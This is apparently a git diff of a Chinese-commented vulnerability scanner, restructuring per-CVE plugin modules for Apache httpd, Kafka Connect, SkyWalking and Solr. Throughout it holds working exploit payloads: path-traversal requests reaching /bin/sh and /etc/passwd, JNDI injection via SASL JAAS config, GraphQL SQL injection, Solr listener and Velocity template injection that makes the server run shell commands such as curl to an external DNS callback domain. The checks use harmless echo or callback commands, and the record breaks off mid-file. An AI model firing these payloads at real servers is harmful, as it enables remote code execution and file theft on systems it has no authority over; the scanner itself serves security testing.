+                'path': '.%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash',
+                'data': 'echo Content-Type: text/plain; echo; {RCECOMMAND}'
+            },
+            {
+                'path': 'cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh',
+                'data': 'echo Content-Type: text/plain; echo; {RCECOMMAND}'
+            },
+            {
+                'path': 'cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh',
+                'data': 'echo;{RCECOMMAND}'
+            },
+            {
+                'path': '.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh',
+                'data': 'echo Content-Type: text/plain; echo; {RCECOMMAND}'
+            },
+            # * 无法RCE, 只能FileRead
+            {
+                'path': 'icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd',
+                'data': None
+            },
+            {
+                'path': '.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd',
+                'data': None
+            },
+            {
+                'path': 'icons/.%2e/%2e%2e/%2e%2e/%2e%2e/C:/Windows/System32/drivers/etc/hosts',
+                'data': None
+            },
+            {
+                'path': '.%2e/%2e%2e/%2e%2e/%2e%2e/C:/Windows/System32/drivers/etc/hosts',
+                'data': None
+            },
+        ]
+    
+    def POC(self, clients):
+        hackClient = clients.get('hackClient')
+        
+        vul_info = {
+            'app_name': 'ApacheHttpd',
+            'vul_type': 'RCE/FileRead',
+            'vul_id': 'CVE-2021-41773',
+        }
+
+        for payload in self.payloads:
+            path = payload['path']
+            data = payload['data']
+            random_str = random_md5(6)                      # * 随机6位字符串
+
+            if data:                                        # * 有POST数据则RCE, 否则为FileRead
+                RCEcommand = 'echo ' + random_str
+                data = data.format(RCECOMMAND=RCEcommand)
+                
+                res = hackClient.request(
+                    'post',
+                    path,
+                    data=data,
+                    vul_info=vul_info
+                )
+            else:
+                res = hackClient.request(
+                    'get',
+                    path,
+                    vul_info=vul_info
+                )
+            if res is None:
+                continue
+
+            if (
+                (check.check_res(res.text, random_str))
+                or (check.check_res_fileread(res.text))
+            ):
+                results = {
+                    'Target': res.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/ApacheHttpd/apache-httpd-cve-2021-42013-rce-fileread.py b/payloads/ApacheHttpd/apache-httpd-cve-2021-42013-rce-fileread.py
new file mode 100644
index 0000000..a89da78
--- /dev/null
+++ b/payloads/ApacheHttpd/apache-httpd-cve-2021-42013-rce-fileread.py
@@ -0,0 +1,103 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+Apache HTTP Server 2.4.50 路径遍历
+    CVE-2021-42013
+        Payload: https://vulhub.org/#/environments/httpd/CVE-2021-42013/
+
+CVE-2021-42013是CVE-2021-41773的绕过, 使用.%%32%65/
+'''
+
+from PluginManager import Vuln_Scan
+from lib.tool.md5 import random_md5
+from lib.tool import check
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {
+                'path': 'cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash',
+                'data': 'echo;{RCECOMMAND}'
+            },
+            {
+                'path': '.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash',
+                'data': 'echo;{RCECOMMAND}'
+            },
+            {
+                'path': 'cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh',
+                'data': 'echo;{RCECOMMAND}'
+            },
+            {
+                'path': '.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh',
+                'data': 'echo;{RCECOMMAND}'
+            },
+            # * 无法RCE, 只能FileRead
+            {
+                'path': 'icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd',
+                'data': ''
+            },
+            {
+                'path': '.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd',
+                'data': ''
+            },
+            {
+                'path': 'icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/C:/Windows/System32/drivers/etc/hosts',
+                'data': ''
+            },
+            {
+                'path': '.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/C:/Windows/System32/drivers/etc/hosts',
+                'data': ''
+            }
+        ]
+    
+    def POC(self, clients):
+        hackClient = clients.get('hackClient')
+        
+        vul_info = {
+            'app_name': 'ApacheHttpd',
+            'vul_type': 'RCE/FileRead',
+            'vul_id': 'CVE-2021-42013',
+        }
+
+        for payload in self.payloads:
+            path = payload['path']
+            data = payload['data']
+            random_str = random_md5(6)                  # * 随机6位字符串
+
+            if data:                                    # * 有POST数据则RCE, 否则为FileRead
+                RCEcommand = 'echo ' + random_str
+                data = data.format(RCECOMMAND=RCEcommand)
+                
+                res = hackClient.request(
+                    'get',
+                    path,
+                    data=data,
+                    vul_info=vul_info
+                )
+            else:
+                res = hackClient.request(
+                    'get',
+                    path,
+                    vul_info=vul_info
+                )
+            if res is None:
+                continue
+
+            if (
+                (check.check_res(res.text, random_str))
+                or (check.check_res_fileread(res.text))
+            ):
+                results = {
+                    'Target': res.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/ApacheHttpd/cve_2021_41773.py b/payloads/ApacheHttpd/cve_2021_41773.py
deleted file mode 100644
index 8b8ece8..0000000
--- a/payloads/ApacheHttpd/cve_2021_41773.py
+++ /dev/null
@@ -1,98 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.tool.md5 import random_md5
-from lib.tool import check
-
-cve_2021_41773_payloads = [
-    {
-        'path': 'cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash',
-        'data': 'echo Content-Type: text/plain; echo; {RCECOMMAND}'
-    },
-    {
-        'path': 'cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash',
-        'data': 'echo;{RCECOMMAND}'
-    },
-    {
-        'path': '.%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash',
-        'data': 'echo Content-Type: text/plain; echo; {RCECOMMAND}'
-    },
-    {
-        'path': 'cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh',
-        'data': 'echo Content-Type: text/plain; echo; {RCECOMMAND}'
-    },
-    {
-        'path': 'cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh',
-        'data': 'echo;{RCECOMMAND}'
-    },
-    {
-        'path': '.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh',
-        'data': 'echo Content-Type: text/plain; echo; {RCECOMMAND}'
-    },
-    # * 无法RCE, 只能FileRead
-    {
-        'path': 'icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd',
-        'data': None
-    },
-    {
-        'path': '.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd',
-        'data': None
-    },
-    {
-        'path': 'icons/.%2e/%2e%2e/%2e%2e/%2e%2e/C:/Windows/System32/drivers/etc/hosts',
-        'data': None
-    },
-    {
-        'path': '.%2e/%2e%2e/%2e%2e/%2e%2e/C:/Windows/System32/drivers/etc/hosts',
-        'data': None
-    },
-]
-
-def cve_2021_41773_scan(clients):
-    ''' 在 Apache HTTP Server 2.4.49 中对路径规范化所做的更改中发现了一个缺陷,
-        攻击者可以使用路径遍历攻击将URL映射到网站根目录预期之外的文件
-            在特定情况下, 攻击者可构造恶意请求执行系统命令
-    '''
-    hackClient = clients.get('hackClient')
-    
-    vul_info = {
-        'app_name': 'ApacheHttpd',
-        'vul_type': 'RCE/FileRead',
-        'vul_id': 'CVE-2021-41773',
-    }
-
-    for payload in cve_2021_41773_payloads:
-        path = payload['path']
-        data = payload['data']
-        random_str = random_md5(6)                      # * 随机6位字符串
-
-        if data:                                        # * 有POST数据则RCE, 否则为FileRead
-            RCEcommand = 'echo ' + random_str
-            data = data.format(RCECOMMAND=RCEcommand)
-            
-            res = hackClient.request(
-                'post',
-                path,
-                data=data,
-                vul_info=vul_info
-            )
-        else:
-            res = hackClient.request(
-                'get',
-                path,
-                vul_info=vul_info
-            )
-        if res is None:
-            continue
-
-        if (
-            (check.check_res(res.text, random_str))
-            or (check.check_res_fileread(res.text))
-        ):
-            results = {
-                'Target': res.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-    return None
diff --git a/payloads/ApacheHttpd/cve_2021_42013.py b/payloads/ApacheHttpd/cve_2021_42013.py
deleted file mode 100644
index 9f5b3c2..0000000
--- a/payloads/ApacheHttpd/cve_2021_42013.py
+++ /dev/null
@@ -1,87 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.tool.md5 import random_md5
-from lib.tool import check
-
-cve_2021_42013_payloads = [
-    {
-        'path': 'cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash',
-        'data': 'echo;{RCECOMMAND}'
-    },
-    {
-        'path': '.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash',
-        'data': 'echo;{RCECOMMAND}'
-    },
-    {
-        'path': 'cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh',
-        'data': 'echo;{RCECOMMAND}'
-    },
-    {
-        'path': '.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh',
-        'data': 'echo;{RCECOMMAND}'
-    },
-    # * 无法RCE, 只能FileRead
-    {
-        'path': 'icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd',
-        'data': ''
-    },
-    {
-        'path': '.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd',
-        'data': ''
-    },
-    {
-        'path': 'icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/C:/Windows/System32/drivers/etc/hosts',
-        'data': ''
-    },
-    {
-        'path': '.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/C:/Windows/System32/drivers/etc/hosts',
-        'data': ''
-    }
-]
-
-def cve_2021_42013_scan(clients):
-    ''' CVE-2021-42013是CVE-2021-41773的绕过, 使用.%%32%65/ '''
-    hackClient = clients.get('hackClient')
-    
-    vul_info = {
-        'app_name': 'ApacheHttpd',
-        'vul_type': 'RCE/FileRead',
-        'vul_id': 'CVE-2021-42013',
-    }
-
-    for payload in cve_2021_42013_payloads:
-        path = payload['path']
-        data = payload['data']
-        random_str = random_md5(6)                  # * 随机6位字符串
-
-        if data:                                    # * 有POST数据则RCE, 否则为FileRead
-            RCEcommand = 'echo ' + random_str
-            data = data.format(RCECOMMAND=RCEcommand)
-            
-            res = hackClient.request(
-                'get',
-                path,
-                data=data,
-                vul_info=vul_info
-            )
-        else:
-            res = hackClient.request(
-                'get',
-                path,
-                vul_info=vul_info
-            )
-        if res is None:
-            continue
-
-        if (
-            (check.check_res(res.text, random_str))
-            or (check.check_res_fileread(res.text))
-        ):
-            results = {
-                'Target': res.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-    return None
diff --git a/payloads/ApacheHttpd/main.py b/payloads/ApacheHttpd/main.py
deleted file mode 100644
index 775ad83..0000000
--- a/payloads/ApacheHttpd/main.py
+++ /dev/null
@@ -1,45 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-'''
-httpd是Apache超文本传输协议(HTTP)服务器的主程序: https://httpd.apache.org/download.cgi
-    Apache httpd扫描类: 
-        1. Apache httpd 2.4.48 mod_proxy SSRF
-            CVE-2021-40438
-                Payload: https://vulhub.org/#/environments/httpd/CVE-2021-40438/
-
-        2. Apache httpd 2.4.49 路径遍历
-            CVE-2021-41773
-                Payload: https://vulhub.org/#/environments/httpd/CVE-2021-41773/
-                Paylaod: https://github.com/thehackersbrain/CVE-2021-41773/blob/main/exploit.py
-
-        3. Apache HTTP Server 2.4.50 路径遍历
-            CVE-2021-42013
-                Payload: https://vulhub.org/#/environments/httpd/CVE-2021-42013/
-
-file:///etc/passwd
-file:///C:/Windows/System32/drivers/etc/hosts
-file:///C:\Windows\System32\drivers\etc\hosts
-'''
-
-# from lib.initial.config import config
-from lib.tool.thread import thread
-from payloads.ApacheHttpd.cve_2021_40438 import cve_2021_40438_scan
-from payloads.ApacheHttpd.cve_2021_41773 import cve_2021_41773_scan
-from payloads.ApacheHttpd.cve_2021_42013 import cve_2021_42013_scan
-
-class ApacheHttpd():
-    def __init__(self):
-        self.app_name = 'ApacheHttpd'
-
-    def addscan(self, clients, vuln=None):
-        if vuln:
-            return eval('thread(target={}_scan, clients=clients)'.format(vuln))
-
-        return [
-            thread(target=cve_2021_40438_scan, clients=clients),
-            thread(target=cve_2021_41773_scan, clients=clients),
-            thread(target=cve_2021_42013_scan, clients=clients)
-        ]
-
-httpd = ApacheHttpd()
diff --git a/payloads/ApacheKafka/cve_2023_25194.py b/payloads/ApacheKafka/cve_2023_25194.py
deleted file mode 100644
index ee2fd1b..0000000
--- a/payloads/ApacheKafka/cve_2023_25194.py
+++ /dev/null
@@ -1,95 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.api.dns import dns
-from lib.tool.md5 import random_md5
-from time import sleep
-
-base_data = '''{"name": "test", 
-   "config":
-    {
-        "connector.class":"io.debezium.connector.mysql.MySqlConnector",
-      "database.hostname": "localhost",
-      "database.port": "3306",
-      "database.user": "root",
-      "database.password": "123456",
-      "database.dbname": "mysql",
-      "database.sslmode": "SSL_MODE",
-        "database.server.id": "1234",
-      "database.server.name": "localhost",
-        "table.include.list": "MYSQL_TABLES",
-      "tasks.max":"1",
-        "topic.prefix": "aaa22",
-        "debezium.source.database.history": "io.debezium.relational.history.MemoryDatabaseHistory",
-        "schema.history.internal.kafka.topic": "aaa22",
-        "schema.history.internal.kafka.bootstrap.servers": "localhost:9092",
-      "database.history.producer.security.protocol": "SASL_SSL",
-      "database.history.producer.sasl.mechanism": "PLAIN",
-      "database.history.producer.sasl.jaas.config": "com.sun.security.auth.module.JndiLoginModule required user.provider.url=\\"PAYLOAD\\" useFirstPass=\\"true\\" serviceName=\\"x\\" debug=\\"true\\" group.provider.url=\\"xxx\\";"
-    }
-}'''
-
-cve_2023_25194_payloads = [
-    {
-        'path': 'connectors',
-        'data': base_data.replace('PAYLOAD', 'ldap://DNSDOMAIN'),
-    },
-    {
-        'path': 'connectors',
-        'data': base_data.replace('PAYLOAD', 'rmi://DNSDOMAIN'),
-    },
-    {
-        'path': 'connectors',
-        'data': base_data.replace('PAYLOAD', 'dns://DNSDOMAIN'),
-    },
-    {
-        'path': 'connectors',
-        'data': base_data.replace('PAYLOAD', 'http://DNSDOMAIN'),
-    },
-]
-
-def cve_2023_25194_scan(clients):
-    ''' 攻击者在可以控制Apache Kafka Connect 客户端的情况下
-        可通过SASL JAAS 配置和基于 SASL 的安全协议在其上创建或修改连接器
-        触发JNDI代码执行漏洞
-    '''
-    client = clients.get('reqClient')
-    sessid = '3b12aef95938e027ecb9e88fc9315d11'
-    
-    vul_info = {
-        'app_name': 'ApacheKafka',
-        'vul_type': 'RCE',
-        'vul_id': 'CVE-2023-25194',
-    }
-    
-    headers = {
-        'Content-Type': 'application/json'
-    }
-
-    for payload in cve_2023_25194_payloads:
-        md = random_md5()                                       # * 随机md5值, 8位
-        dns_domain = md + '.' + dns.domain(sessid)              # * DNSLOG域名
-        
-        path = payload['path']
-        data = payload['data'].replace('DNSDOMAIN', dns_domain)
-
-        res = client.request(
-            'get',
-            path,
-            data=data,
-            headers=headers,
-            allow_redirects=False,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        sleep(3)                                                # * dns查询可能较慢, 等一会
-        if (dns.result(md, sessid)):
-            results = {
-                'Target': res.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-    return None
diff --git a/payloads/ApacheKafka/main.py b/payloads/ApacheKafka/main.py
deleted file mode 100644
index 6736a14..0000000
--- a/payloads/ApacheKafka/main.py
+++ /dev/null
@@ -1,34 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-'''
-(还未测试准确性)
-
-Apache Kafka 是一个开源分布式事件流平台，可用于高性能数据管道、流分析、数据集成和任务关键型应用程序
-    Apache Kafka扫描类: 
-        Apache Kafka Connect 远程代码执行
-            CVE-2023-25194
-                Payload: https://github.com/ohnonoyesyes/CVE-2023-25194
-
-file:///etc/passwd
-file:///C:/Windows/System32/drivers/etc/hosts
-file:///C:\Windows\System32\drivers\etc\hosts
-'''
-
-# from lib.initial.config import config
-from lib.tool.thread import thread
-from payloads.ApacheKafka.cve_2023_25194 import cve_2023_25194_scan
-
-class ApacheKafka():
-    def __init__(self):
-        self.app_name = 'ApacheKafka'
-
-    def addscan(self, clients, vuln=None):
-        if vuln:
-            return eval('thread(target={}_scan, clients=clients)'.format(vuln))
-
-        return [
-            thread(target=cve_2023_25194_scan, clients=clients)
-        ]
-
-kafka = ApacheKafka()
diff --git a/payloads/ApacheSkyWalking/apache-skywalking-cve-2020-9483-sqlinject.py b/payloads/ApacheSkyWalking/apache-skywalking-cve-2020-9483-sqlinject.py
new file mode 100644
index 0000000..1bd07de
--- /dev/null
+++ b/payloads/ApacheSkyWalking/apache-skywalking-cve-2020-9483-sqlinject.py
@@ -0,0 +1,67 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+Apache SkyWalking是阿帕奇的一款主要用于微服务、云原生和基于容器等环境的应用程序性能监视器
+    SkyWalking SQL注入
+        CVE-2020-9483
+            Payload: https://vulhub.org/#/environments/skywalking/8.3.0-sqli/
+
+在Apache Skywalking 8.3.0版本及以前的GraphQL接口中, 存在一处H2 Database SQL注入漏洞
+'''
+
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {
+                'path': 'graphql',
+                'data': '''{"query":"query queryLogs($condition:LogQueryCondition){queryLogs(condition: $condition) {total logs {serviceId serviceName isError content}}}","variables":{"condition":{"metricName":"sqli","state":"ALL","paging":{"pageSize":10}}}}'''
+            },
+        ]
+
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        
+        vul_info = {
+            'app_name': 'ApacheSkyWalking',
+            'vul_type': 'SQLinject',
+            'vul_id': 'CVE-2020-9483',
+        }
+
+        headers = {
+            'Content-Type': 'application/json'
+        }
+
+        for payload in self.payloads:
+            path = payload['path']
+            data = payload['data']
+
+            res = client.request(
+                'post',
+                path,
+                data=data,
+                headers=headers,
+                allow_redirects=False,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+            if (('Exception while fetching data (/queryLogs) : Table \\"SQLI\\" not found' in res.text)
+                and ('select 1 from sqli where  1=1' in res.text)
+            ):
+                results = {
+                    'Target': res.request.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/ApacheSkyWalking/cve_2020_9483.py b/payloads/ApacheSkyWalking/cve_2020_9483.py
deleted file mode 100644
index 1812012..0000000
--- a/payloads/ApacheSkyWalking/cve_2020_9483.py
+++ /dev/null
@@ -1,77 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-# import re
-
-cve_2020_9483_payloads = [
-    {
-        'path': 'graphql',
-        'data': '''{"query":"query queryLogs($condition:LogQueryCondition){queryLogs(condition: $condition) {total logs {serviceId serviceName isError content}}}","variables":{"condition":{"metricName":"sqli","state":"ALL","paging":{"pageSize":10}}}}'''
-    },
-#     {
-#         'path': 'graphql',
-#         'data': '''{
-#     "query":"query queryLogs($condition: LogQueryCondition) {
-#   queryLogs(condition: $condition) {
-#     total
-#     logs {
-#       serviceId
-#       serviceName
-#       isError
-#       content
-#     }
-#   }
-# }
-# ",
-#     "variables":{
-#         "condition":{
-#             "metricName":"sqli",
-#             "state":"ALL",
-#             "paging":{
-#                 "pageSize":10
-#             }
-#         }
-#     }
-# }'''
-#     },
-]
-
-def cve_2020_9483_scan(clients):
-    ''' 在Apache Skywalking 8.3.0版本及以前的GraphQL接口中, 存在一处H2 Database SQL注入漏洞 '''
-    client = clients.get('reqClient')
-    
-    vul_info = {
-        'app_name': 'ApacheSkyWalking',
-        'vul_type': 'SQLinject',
-        'vul_id': 'CVE-2020-9483',
-    }
-
-    headers = {
-        'Content-Type': 'application/json'
-    }
-
-    for payload in cve_2020_9483_payloads:
-        path = payload['path']
-        data = payload['data']
-
-        res = client.request(
-            'post',
-            path,
-            data=data,
-            headers=headers,
-            allow_redirects=False,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        if (('Exception while fetching data (/queryLogs) : Table \\"SQLI\\" not found' in res.text)
-            and ('select 1 from sqli where  1=1' in res.text)
-        ):
-            results = {
-                'Target': res.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-    return None
diff --git a/payloads/ApacheSkyWalking/main.py b/payloads/ApacheSkyWalking/main.py
deleted file mode 100644
index 4996f6e..0000000
--- a/payloads/ApacheSkyWalking/main.py
+++ /dev/null
@@ -1,32 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-'''
-Apache SkyWalking是阿帕奇的一款主要用于微服务、云原生和基于容器等环境的应用程序性能监视器
-    Apache SkyWalking扫描类: 
-        1. SkyWalking SQL注入
-            CVE-2020-9483
-                Payload: https://vulhub.org/#/environments/skywalking/8.3.0-sqli/
-
-file:///etc/passwd
-file:///C:/Windows/System32/drivers/etc/hosts
-file:///C:\Windows\System32\drivers\etc\hosts
-'''
-
-# from lib.initial.config import config
-from lib.tool.thread import thread
-from payloads.ApacheSkyWalking.cve_2020_9483 import cve_2020_9483_scan
-
-class ApacheSkyWalking():
-    def __init__(self):
-        self.app_name = 'ApacheSkyWalking'
-
-    def addscan(self, clients, vuln=None):
-        if vuln:
-            return eval('thread(target={}_scan, clients=clients)'.format(vuln))
-
-        return [
-            thread(target=cve_2020_9483_scan, clients=clients)
-        ]
-
-skywalking = ApacheSkyWalking()
diff --git a/payloads/ApacheSolr/apache-solr-cve-2017-12629-rce.py b/payloads/ApacheSolr/apache-solr-cve-2017-12629-rce.py
new file mode 100644
index 0000000..63afb43
--- /dev/null
+++ b/payloads/ApacheSolr/apache-solr-cve-2017-12629-rce.py
@@ -0,0 +1,127 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+Solr 远程命令执行
+    CVE-2017-12629
+        Payload: https://vulhub.org/#/environments/solr/CVE-2017-12629-RCE/
+
+7.1.0之前版本总共爆出两个漏洞: XML实体扩展漏洞(XXE)和远程命令执行漏洞(RCE)
+    二者可以连接成利用链, 编号均为CVE-2017-12629
+'''
+
+from payloads.ApacheSolr.tool_enable import enable
+from lib.initial.config import config
+from lib.api.dns import dns
+from lib.tool.md5 import random_md5
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        random_name = random_md5()
+        self.payloads = [
+            {
+                'path': 'solr/{DBNAME}/config',
+                'data': '{"add-listener":{"event":"postCommit","name":"' + random_name + '","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c", "curl DNSDOMAIN"]}}',
+                'path-2': 'solr/{DBNAME}/update',
+                'data-2': '[{"id":"test"}]',
+            },
+            {
+                'path': 'solr/{DBNAME}/config',
+                'data': '{"add-listener":{"event":"postCommit","name":"' + random_name + '","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c", "ping -c 4 DNSDOMAIN"]}}',
+                'path-2': 'solr/{DBNAME}/update',
+                'data-2': '[{"id":"test"}]',
+            },
+            {
+                'path': 'solr/{DBNAME}/config',
+                'data': '{"add-listener":{"event":"postCommit","name":"' + random_name + '","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c", "ping DNSDOMAIN"]}}',
+                'path-2': 'solr/{DBNAME}/update',
+                'data-2': '[{"id":"test"}]',
+            },
+            {
+                'path': 'config',
+                'data': '{"add-listener":{"event":"postCommit","name":"' + random_name + '","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c", "curl DNSDOMAIN"]}}',
+                'path-2': 'update',
+                'data-2': '[{"id":"test"}]',
+            },
+            {
+                'path': 'config',
+                'data': '{"add-listener":{"event":"postCommit","name":"' + random_name + '","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c", "ping -c 4 DNSDOMAIN"]}}',
+                'path-2': 'update',
+                'data-2': '[{"id":"test"}]',
+            },
+            {
+                'path': 'config',
+                'data': '{"add-listener":{"event":"postCommit","name":"' + random_name + '","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c", "ping DNSDOMAIN"]}}',
+                'path-2': 'update',
+                'data-2': '[{"id":"test"}]',
+            }
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        sessid = '60491ea49ab435a2cc1acb7aa93e3409'
+
+        vul_info = {
+            'app_name': 'ApacheSolr',
+            'vul_type': 'RCE',
+            'vul_id': 'CVE-2017-12629',
+        }
+
+        headers = {
+            'Content-Type': 'application/json'
+        }
+
+        if not config.get('Solr-db_name'):
+            enable(client)                      # * 如果没有Solr数据库名称, 则获取
+        if not config.get('Solr-db_name'):
+            return None                         # * 如果还是没有, 则退出
+
+        dnslog_md = random_md5()                                    # * 随机md5值, 8位
+        dnslog_domain = dnslog_md + '.' + dns.domain(sessid)        # * dnslog/ceye域名
+
+        for payload in self.payloads:
+            path = payload['path'].format(DBNAME=config.get('Solr-db_name'))
+            data = payload['data'].replace('DNSDOMAIN', dnslog_domain)
+
+            res = client.request(
+                'post',
+                path,
+                data=data,
+                headers=headers,
+                allow_redirects=False,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+            
+            if ('"WARNING":"This response format is experimental.  It is likely to change in the future."' in res.text):
+                path_2 = payload['path-2'].format(DBNAME=config.get('Solr-db_name'))
+                data_2 = payload['data-2']
+                
+                res2 = client.request(
+                    'post',
+                    path_2,
+                    data=data_2, 
+                    headers=headers,
+                    allow_redirects=False,
+                    vul_info=vul_info
+                )
+                if res2 is None:
+                    continue
+
+                if (dns.result(dnslog_md, sessid, 10)):
+                    results = {
+                        'Target': res.request.url,
+                        'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                        'Request': res,
+                        'Request-2': res2
+                    }
+                    return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/ApacheSolr/apache-solr-cve-2019-17558-rce.py b/payloads/ApacheSolr/apache-solr-cve-2019-17558-rce.py
new file mode 100644
index 0000000..e7c310d
--- /dev/null
+++ b/payloads/ApacheSolr/apache-solr-cve-2019-17558-rce.py
@@ -0,0 +1,69 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+Solr Velocity 注入远程命令执行
+    CVE-2019-17558
+        Payload: https://vulhub.org/#/environments/solr/CVE-2019-17558/
+
+5.0.0版本至8.3.1版本中存在输入验证错误漏洞, 
+    攻击者可借助自定义的Velocity模板功能, 利用Velocity-SSTI漏洞在Solr系统上执行任意代码
+'''
+
+from payloads.ApacheSolr.tool_enable import enable
+from lib.initial.config import config
+from lib.tool.md5 import random_md5
+from lib.tool import check
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {'path': "solr/{DBNAME}/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27{RCECOMMAND}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end"},
+            {'path': "{DBNAME}/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27{RCECOMMAND}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end"},
